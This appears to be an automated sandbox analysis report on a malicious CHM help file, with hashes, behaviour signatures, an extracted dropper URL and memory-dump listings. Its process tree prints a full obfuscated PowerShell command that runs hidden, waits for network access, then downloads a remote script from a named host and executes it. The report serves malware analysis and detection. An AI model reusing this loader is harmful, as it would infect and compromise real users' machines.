Analysis

  • max time kernel
    169s
  • max time network
    193s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags
    arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
  • submitted
    08/10/2023, 01:29

General

  • Target

    QJA_2023.05-22_Q_16-25.chm

  • Size

    11KB

  • MD5

    5f36f1a3b78d286033a6dac8340446ee

  • SHA1

    6659d0703128dc55bd9776f3fd909f301650ae10

  • SHA256

    0a7186e481d3a29e2ff9b60e937e389ea0d2a69aa513f1fb2d66a000601482fb

  • SHA512

    57b734d05a665996258885e4d7a3171e70b30195f65ada04e4487995dc1968266bff8b0f9931750e2894650e0fda98d4c879b21df0fed7aaf046512631f1c825

  • SSDEEP

    96:APcU9sWLZI1rqc4MTz9XTeNq73QNQyd2HyNLqxOb4:APJ9O2M39XQqDIQuOy

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
    yes
  • URLs (ps1.dropper)
    https://tijunaitiene.lt/x99.txt

Signatures

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\QJA_2023.05-22_Q_16-25.chm
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://tijunaitiene.lt/x99.txt')|P
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2416

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2416-9-0x000000001B260000-0x000000001B542000-memory.dmp

    Filesize

    2.9MB

  • memory/2416-10-0x0000000002420000-0x0000000002428000-memory.dmp

    Filesize

    32KB

  • memory/2416-11-0x000007FEF3600000-0x000007FEF3F9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2416-12-0x0000000002500000-0x0000000002580000-memory.dmp

    Filesize

    512KB

  • memory/2416-13-0x000007FEF3600000-0x000007FEF3F9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2416-14-0x0000000002500000-0x0000000002580000-memory.dmp

    Filesize

    512KB

  • memory/2416-15-0x0000000002500000-0x0000000002580000-memory.dmp

    Filesize

    512KB

  • memory/2416-16-0x0000000002500000-0x0000000002580000-memory.dmp

    Filesize

    512KB

  • memory/2416-17-0x000007FEF3600000-0x000007FEF3F9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2416-18-0x0000000002500000-0x0000000002580000-memory.dmp

    Filesize

    512KB

  • memory/2416-19-0x000007FEF3600000-0x000007FEF3F9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2416-20-0x0000000002500000-0x0000000002580000-memory.dmp

    Filesize

    512KB

  • memory/2416-21-0x0000000002500000-0x0000000002580000-memory.dmp

    Filesize

    512KB

  • memory/2416-22-0x0000000002500000-0x0000000002580000-memory.dmp

    Filesize

    512KB